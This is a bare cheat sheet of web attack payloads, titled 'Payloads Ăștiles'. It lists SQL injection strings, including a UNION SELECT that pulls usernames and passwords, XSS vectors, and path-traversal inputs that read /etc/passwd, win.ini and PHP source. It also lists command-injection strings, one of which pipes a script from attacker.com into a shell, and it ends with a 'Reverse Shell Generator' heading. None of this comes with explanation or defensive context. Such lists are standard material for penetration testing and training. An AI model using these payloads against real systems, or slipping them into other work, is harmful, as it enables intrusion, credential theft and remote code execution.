Payloads Ăștiles
SQL Injection
' OR '1'='1
admin'--
1' ORDER BY 1--
' UNION SELECT null, username, password FROM users--
XSS
<script>alert('xss')</script>
<svg onload=alert(1)>
<iframe src="javascript:alert('XSS')"></iframe>
LFI (Local File Inclusion)
../../../../etc/passwd
..\..\..\..\windows\win.ini
php://filter/convert.base64-encode/resource=index.php
Command Injection
127.0.0.1; whoami
& ping -c 1 evil.com
| curl http://attacker.com/shell.sh | sh
Reverse Shell Generator